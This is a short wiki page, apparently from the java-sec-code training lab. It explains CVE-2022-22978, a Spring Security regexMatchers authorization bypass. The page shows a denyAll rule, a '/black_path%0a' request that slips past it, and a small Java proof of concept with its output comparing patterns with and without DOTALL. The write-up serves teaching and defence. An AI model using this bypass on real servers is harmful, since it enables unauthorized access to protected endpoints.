-
Notifications
You must be signed in to change notification settings - Fork 651
CVE 2022 22978
JoyChou edited this page Jan 16, 2023
·
4 revisions
CVE-2022-22978 java-sec-code的靶场环境:
- Spring-Security版本:
4.2.12.RELEASE
代码:
http.authorizeRequests().regexMatchers("/black_path.*").denyAll() 访问http://localhost:8080/black_path返回 403 forbidden by JoyChou.
访问http://localhost:8080/black_path%0a返回404页面。由于低版本的SpringBoot无法接收%0d和%0a路由,SpringBoot 2.7.x可接收。并且java-sec-code的SpringBoot版本不方便升级,所以没写black_path的路由,只是为了单纯证明可绕过Spring Security。
public static void main(String[] args) throws Exception{
Pattern vuln_pattern = Pattern.compile("/black_path.*");
Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL);
String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString());
System.out.println("Poc: " + poc);
System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches()); // false,非dotall无法匹配\r\n
System.out.println("Dotall: " + sec_pattern.matcher(poc).matches()); // true,dotall可以匹配\r\n
}返回:
Poc: /black_path
/xx
Not dotall: false
Dotall: true